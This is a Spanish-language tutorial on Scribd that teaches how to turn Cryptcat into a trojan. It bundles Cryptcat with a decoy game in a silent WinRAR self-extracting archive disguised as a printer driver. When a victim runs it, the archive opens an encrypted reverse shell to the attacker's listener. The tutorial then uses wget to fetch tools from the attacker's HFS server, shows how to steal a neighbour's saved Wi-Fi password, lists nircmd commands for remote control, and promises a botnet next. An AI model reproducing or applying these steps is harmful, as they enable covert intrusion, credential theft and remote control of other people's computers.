Scribd
Cargar
156 vistas14 páginas

Uso de Cryptcat en Windows

El documento describe cómo usar Cryptcat, una herramienta similar a Netcat pero que encripta el tráfico de datos, haciéndolo más seguro. Explica cómo usar Cryptcat para establecer una shell inversa encriptada en un sistema remoto y luego usar herramientas como Wget y Nircmd para transferir archivos y controlar el sistema de manera remota de forma encubierta.

Cargado por

Atilio Josue Alvarez Carias
Derechos de autor
© Attribution Non-Commercial (BY-NC)
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
156 vistas14 páginas

Uso de Cryptcat en Windows

El documento describe cómo usar Cryptcat, una herramienta similar a Netcat pero que encripta el tráfico de datos, haciéndolo más seguro. Explica cómo usar Cryptcat para establecer una shell inversa encriptada en un sistema remoto y luego usar herramientas como Wget y Nircmd para transferir archivos y controlar el sistema de manera remota de forma encubierta.

Cargado por

Atilio Josue Alvarez Carias
Derechos de autor
© Attribution Non-Commercial (BY-NC)
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Jugando con Cryptcat I

Que es Cryptcat? R: Es un software que tiene exactamente la misma funcionalidad que netcat a diferencia que su transferencia de paquetes son encriptados, en otras palabras mas simples es lo mismo que el netcat pero cuando alguien est monitoreando su red ya no podr ver lo que est pasando antes con netcat podan descubrirte gracias a sus Sniffers tal como aparece en esta imagen:

Si no entiendes lo que digo entonces no te preocupes lo que quiero decir es que es mas seguro que netcat eso es todo :p . Otra ventaja es que Cryptcat NO es detectado por ningn antivirus porque es una herramienta de administracin remota al igual que netcat pero bueno as son las cosas de la vida, de seguro en unas semanas o meses mas ser tomado como troyano igual que netcat. En este tutorial aprenderemos a sacarle el jugo a cryptcat como herramienta remota desde subirlo con una webshell hasta convertirlo en un poderossimo botnet. OK, manos a la obra.

Materiales: Cryptcat NT Winrar HFS Wget Nircmd Un icono Pueden descargar cada archivo desde [Link] donde dice bin. Para los que no saben que es NetCat har un pequeo repaso sobre:

Troyanizando Cryptcat (Shell inversa)


Primero le cambiamos el nombre al cryptcat y le pondremos [Link], al wget le ponemos [Link] y por ltimo al Nircmd le ponemos [Link], ahora debera quedar algo asi no se olviden de cada nombre para no confundirse despus: [Link] > [Link] [Link] > [Link] [Link] > [Link] Mas adelante veremos para que sirve el wget y el nircmd. Ahora escogemos una carnada en mi caso usar un juego llamado ttt (Tic Tac Toe) conocen el juego del gato? :p , ahora que tenemos los 4 ejecutables ([Link], [Link], [Link] y [Link]) vamos a seleccionarlos y con el botn derecho le damos en aadir al archivo

Ahora le damos nombre (yo le puse [Link]) y le decimos que queremos crear un archivo SFX para que se autoejecute al descomprimirse no importa que la otra persona no tenga instalado winrar porque se ejecutar igual pasa de ser .rar a .exe

Ahora vamos a la pestaa Avanzado y hacemos clic donde dice Opciones SFX:

Aparecer la ventana para las opciones de SFX y donde dice Carpeta de extraccin le ponemos %homepath%\printer Por qu?, porque %homepath% significa c:\documents and settings\usuario y es el nico

directorio donde tienes acceso de sobre escritura (%tmp% est dentro de %homepath%), adems le decimos printer para hacer creer que es un driver o algo que tenga que ver con impresoras.. asi no sospechan :p . Donde dice Ejecutar tras la extraccin escribimos ejecutar y nada mas despus veremos porque:

Ahora vamos a la pestaita Modos y le decimos que no muestre nada y que no sobrescriba nada para evitar que arroje errores al intentar sobrescribir:

Ahora vamos a la pestaa Texto e icono y vamos a elegir el icono para nuestra carnada (yo eleg el de Dungeon :p ).. tal como aparece en la imagen despus de elegir el icono le damos aceptar y luego aceptar nuevamente en las opciones avanzadas de SFX:

Recuerdan cuando pusimos ejecutar?, ahora lo vamos a editar en la pestaa Comentario:

Debe quedar de la siguente manera:

Esto significa que se ejecutar el cryptcat e inmediatamente el juego ttt para no levantar sospechas. Luego le damos aceptar y debe quedar algo asi:

Donde dice [Link] le ponemos nuestra IP obviamente. (tu ip puedes verla abriendo el men inicio y haciendo clic donde dice ejecutar y le pones esto: cmd /c ipconfig&&pause y le das aceptar, debe aparecerte algo como esto:

Como pueden ver la ip que usaremos en Internet ser la de color rojo y si lo hacemos en una pc que est dentro de una misma red por ejemplo las PCs de tu casa usars la verde. La de color verde es la que dice Conexin de rea local y la de rojo aparece el nombre de tu conexin, en mi caso dice speedy. Ahora para mayor comodidad colocamos nuestro cryptcat en C:\windows y luego vamos al men inicio y hacemos clic en ejecutar, luego escribimos CMD y le damos en aceptar te aparecer una pantalla similar a la de arriba y escribirs cryptcat -vv -L -p 99 , por ltimo le das la carnada a la persona de prueba (victima) y cuando lo ejecute ya tendrs el control de su pc a travs de una shell inversa encriptada :D

Ahora que ya tenemos la shell les ensear el uso de Wget y Nircmd. Nunca has sentido la necesidad de hacer transferencia de archivos?... el Wget te permite eso de la siguiente manera. Primero pon tu HFS en un lugar donde no lo movers mas te recomiendo en archivos de programa., luego le haces doble clic y te aparecer un mensaje, le respondes con un no :p Ahora que ya est abierto arrastras un archivo cualquiera hasta ese programa y aparecer un link arriba (en mi caso utilic el Wireless Key View):

Ahora como hacemos el traspaso del archivo? Desde tu shell ejecutamos lo siguiente: [Link] -c -t0 [Link] Le ponemos la ruta que aparece en el HFS y quedara algo asi: [Link] -c -t0 [Link]

Ahora que lo bajamos podremos ejecutarlo [Link] /stext [Link] ahora esperas unos 10 segundos para que se genere el archivo y lo visualizas con el comando type type [Link] y tendrs la contrasea de conexin wireless de tu vecino :p . Esta captura no la voy a mostrar para no revelar contraseas :p

Ahora Para que sirve el Nircmd?, es un software con multitudes de funciones que te van a simplificar la vida a montones.

Ejemplos para el uso de Nircmd Open the door of J: CD-ROM drive Close the door of Y: CD-ROM drive Increase the system volume by 2000 units (out of 65535) Decrease the system volume by 5000 units (out of 65535) Set the volume to the highest value Mute the system volume Unmute the system volume

[Link] cdrom open j: [Link] cdrom close y: [Link] changesysvolume 2000 [Link] changesysvolume -5000 [Link] setsysvolume 65535 [Link] mutesysvolume 1 [Link] mutesysvolume 0

Switch the system volume between [Link] mutesysvolume 2 the mute and normal state. Create a shortcut on your desktop [Link] cmdshortcut "~$[Link]$" "Switch Volume" that switch the system volume mutesysvolume 2 between the mute and normal state. Turn off the monitor Start the default screen saver Put your computer in 'standby' mode log off the current user Ask if you want to reboot, and if you answer 'Yes', reboot the computer. Turn off your computer Turn off all computers specified in [Link] ! Dial to "My Internet" connection Disconnect the "My Internet" connection Make your Internet Explorer windows 75% transparent ! (192 / 256) [Link] monitor off [Link] screensaver [Link] standby [Link] exitwin logoff [Link] qboxcom "Do you want to reboot ?" "question" exitwin reboot [Link] exitwin poweroff multiremote copy "c:\temp\[Link]" exitwin poweroff force [Link] rasdial "My Internet" [Link] rashangup "My Internet"

[Link] win trans ititle "internet explorer" 192

Minimize all your Internet Explorer windows Close all your Internet Explorer windows Close all your Explorer windows (My Computer, folders, and so on) Hide all your Internet Explorer windows Show all your Internet Explorer windows (after you made them hidden with previous example) Center all top-level windows Remove the title bar of My Computer window. Return the title bar of My Computer window that we removed in the previous example. Set the My Computer window to right-to-left order (For hebrew and arabic languages) Set all child windows of My Computer window to right-to-left order (For hebrew and arabic languages) Create a shortcut on your desktop that closes all your Internet Explorer windows Create a shortcut on your desktop that hides all your Internet Explorer windows Create a shortcut on your desktop that shows back all your Internet Explorer windows

[Link] win min class "IEFrame" [Link] win close class "IEFrame" [Link] win close class "CabinetWClass" [Link] win hide class "IEFrame"

[Link] win show class "IEFrame" [Link] win center alltop [Link] win -style title "my computer" 0x00C00000

[Link] win +style title "my computer" 0x00C00000

nircmd win +exstyle title "my computer" 0x00400000

nircmd win child title "my computer" +exstyle all 0x00400000

[Link] cmdshortcut " "~$[Link]$ "Close All IE" win close class "IEFrame" [Link] cmdshortcut " "~$[Link]$ "Hide All IE" win hide class "IEFrame" [Link] cmdshortcut " "~$[Link]$ "Show All IE" win show class "IEFrame"

Set the Windows Calculator as [Link] win settopmost title "Calculator" 1 most window (above all other windows) Set the Windows Calculator back to regular window (non top-most window) [Link] win settopmost title "Calculator" 0

Create a shortcut to Windows calculator under Start Menu>Programs->Calculators Hide the desktop window Show the desktop window (After hiding it in previous example) Hide the start button on the system tray Show the start button on the system tray Hide the clock on the system tray Show the clock on the system tray Kill (terminate) all instance of Internet Explorer processes Create a shortcut on your desktop that opens the door of K: CDROM drive when you run it. Create a shortcut to NirSoft Web site on your desktop Add NirSoft Web site to your Favorities under Links folder. Create a shortcut to NirSoft Web site on the desktop of all computers listed in [Link] Set the display mode to 800x600x24bit colors Create a shortcut on the desktop that set the display mode to 800x600x24bit colors

[Link] shortcut "f:\winnt\system32\[Link]" "~$[Link]$\Calculators" "Windows Calculator" [Link] win hide class progman [Link] win show class progman [Link] win child class "Shell_TrayWnd" hide class "button" [Link] win child class "Shell_TrayWnd" show class "button" [Link] win child class "Shell_TrayWnd" hide class "TrayClockWClass" [Link] win child class "Shell_TrayWnd" show class "TrayClockWClass" [Link] killprocess [Link]

[Link] cmdshortcut "~$[Link]$" "Open CDROM" cdrom open k:

[Link] urlshortcut "[Link] "~$[Link]$" "NirSoft" [Link] urlshortcut "[Link] "~$[Link]$\Links" "NirSoft" [Link] multiremote copy "c:\temp\[Link]" urlshortcut "[Link] "~$folder.common_desktop$" "NirSoft" [Link] setdisplay 800 600 24 [Link] cmdshortcut "~$[Link]$" "800x600x24" setdisplay 800 600 24

Copy all shortcuts on your desktop [Link] execmd copy "~$[Link]$\*.lnk" f:\temp\desktop to another folder (f:\temp\desktop). Restart your Apache server (under Windows NT/2000/XP/2003) Create a shortcut on your desktop that restarts the Apache server Restart your IIS [Link] service restart apache [Link] cmdshortcut "~$[Link]$" "Restart Apache" service restart apache [Link] service restart w3svc

Restart MySql Open the desired Registry key/value in RegEdit Open the Registry key that you copied to the clipboard in RegEdit. Disable the screen saver Enable the screen saver Change the date/time of the specified filename (creation time and modified time) Copy your desktop folder path to the clipboard Copy your start menu folder path to the clipboard Copy the content of [Link] (simple text file) to the clipboard Add the text content of clipboard to [Link] Clear the clipboard Create all folders specified in "c:\temp\[Link]". The folder path names are separated by CRLF characters. Install the specified .NET assembly in the global assembly cache (like gacutil)

[Link] service restart MySql [Link] regedit "HKLM\Software\Microsoft\Windows\CurrentVersion" "CommonFilesDir" nircmd regedit "~$clipboard$" [Link] regsetval sz "HKCU\control panel\desktop" "ScreenSaveActive" 0 [Link] regsetval sz "HKCU\control panel\desktop" "ScreenSaveActive" 1 [Link] setfiletime "c:\temp\[Link]" "24-06-2003 [Link]" "22-112005 [Link]" [Link] clipboard set ~$[Link]$ [Link] clipboard set ~$folder.start_menu$ [Link] clipboard readfile "c:\My Files\[Link]" [Link] clipboard addfile "c:\My Files\[Link]" [Link] clipboard clear

[Link] paramsfile "c:\temp\[Link]" "" "" execmd md ~$fparam.1$

[Link] gac install "C:\temp\MyAssembly\bin\[Link]"

Bueno est en ingles pero cualquier duda me consultan por ejemplo puedes detener procesos, cambiar la resolucin del monitor, instalar y desinstalar software, manejo de registros, lanza mensajes en forma de ventanita, hasta manejar los recursos de Windows a travs de su API directamente. Adems puede manejar una cantidad de variables enorme. El mismo archivo comprimido para su descarga incluye un archivo de ayuda extra.

Ahora que ya recuerdan bien como troyanizar netcat (en este caso cryptcat) veremos otras funciones muy buenas como por ejemplo crear un minirelay de conexiones directas con hping2 hasta crear tu propio escaneador de puertos casero, si me dan permiso podr demostrar como crear una botnet muy poderosa con cryptcat siguiendo instrucciones desde una web zombi con wget. Saludos y hasta la prxima. Att. WHK.

También podría gustarte